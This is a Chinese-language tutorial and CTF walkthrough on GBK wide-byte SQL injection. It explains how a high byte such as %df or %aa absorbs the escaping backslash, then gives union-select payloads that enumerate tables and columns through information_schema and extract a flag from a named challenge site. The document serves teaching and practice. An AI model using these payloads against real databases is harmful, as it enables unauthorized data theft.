〇、预备知识
首先列举几个常用的URL转码的字符
空格 %20
单引号 %27
# %23
\ %5C
一、原理
宽字节注入发生的位置就是PHP发送请求到MYSQL时字符集使用character_set_client设置值进行了一次编码。在使用PHP连接MySQL的时候,当设置“character_set_client = gbk”时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入
宽字节注入原理即是利用编码转换,将服务器端强制添加的本来用于转义的\
符号吃掉,从而能使攻击者输入的引号起到闭合作用,以至于可以进行SQL注入。
这里的宽字节注入是利用mysql的一个特性,mysql在使用GBK编码(GBK就是常说的宽字节之一,实际上只有两字节)的时候,会认为两个字符是一个汉字(前一个ascii码要大于128,才到汉字的范围),而当我们输入有单引号时会自动加入\进行转义而变为\’(在PHP配置文件中magic_quotes_gpc=On的情况下或者使用addslashes函数,icov函数,mysql_real_escape_string函数、mysql_escape_string函数等,提交的参数中如果带有单引号’,就会被自动转义\’,使得多数注入攻击无效),由于宽字节带来的安全问题主要是吃ASCII字符(一字节)的现象,将后面的一个字节与前一个大于128的ascii码进行组合成为一个完整的字符(mysql判断一个字符是不是汉字,首先两个字符时一个汉字,另外根据gbk编码,第一个字节ascii码大于128,基本上就可以了),此时’前的\就被吃了,我们就可以使用’了,利用这个特性从而可实施SQL注入的利用。
最常使用的宽字节注入是利用%df,其实我们只要第一个ascii码大于128就可以了,比如ascii码为129的就可以,但是我们怎么将他转换为URL编码呢,其实很简单,我们先将129(十进制)转换为十六进制,为0x81,如图1所示,然后在十六进制前面加%即可,即为%81,任意进制在线转换网站请点击此处!另外可以直接记住GBK首字节对应0×81-0xFE,尾字节对应0×40-0xFE(除0×7F),则尾字节会被吃点,如转义符号\对应的编码0×5C!另外简单提一下,GB2312是被GBK兼容的,它的高位范围是0xA1-0xF7,低位范围是0xA1-0xFE(0x5C不在该范围内),因此不能使用编码吃掉%5c。
二、实战
http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1
由下面三图猜测 第二行是查表得到的数据,差不到5对应的表。
于是开始注入
可以这样理解:把url里的id= 后边的内容当作字符串,放在 select id,title from news where id = ' ' 的 ' '中,然后我们加的单引号被转义了,很明显这是没有注入成功的,这暗示可能涉及到宽字节注入
而当我们提交 id=1%aa' and 1=1%23 MySQL的运行的SQL语句为 select * from user where id ='1歿' and 1=1#'
MySQL的的特性,因为GBK是多字节编码,他认为两个字节代表一个汉字,所以%aa和后面的\也就是%5c中变成了一个汉字“歿”,而“逃逸了出来。最后我们加一个#(mysql的注释符,注释掉最后一个单引号)
这里我曾好奇为啥会查出id='1歿'的表?应该没有第二行显示才对,如果你有这样的疑惑看下图 ,原来是自动忽略了数值后的非数值,实际上还是查了id='1'的表。
第二行显示看起来是查到的第一条记录的某一个字段,那么就看看是哪个字段
可见是title字段,那么继续看是什么数据库
继续爆表
id=%aa%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema='sae-chinalover'%23
可以看到数据库外部的引号又被转义了,这样我们可以用数据库的全局变量来做
id=%aa%27 union select 1,group_concat(table_name)from information_schema.tables where table_schema=database()%23
也可以用16进制,MySQL也会把他认为是字符串
下面是爆字段(以ctf4为例,flag在这个表里,但是实际中flag在哪个表 是需要试的)
id=%aa%27 union select 1,group_concat(column_name)from information_schema.columns where table_name='ctf4'%23
还是这问题。之前数据库名可以用database()这个全局变量来代替,但是对于表名并没有对应的全局变量,所以只能采用16进制的方法,MySQL就会把他认为是字符型格式
id=%aa' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634%23
爆出了两列,下面再获取flag的内容
id=%aa%27 union select 1,group_concat(flag) from ctf4%23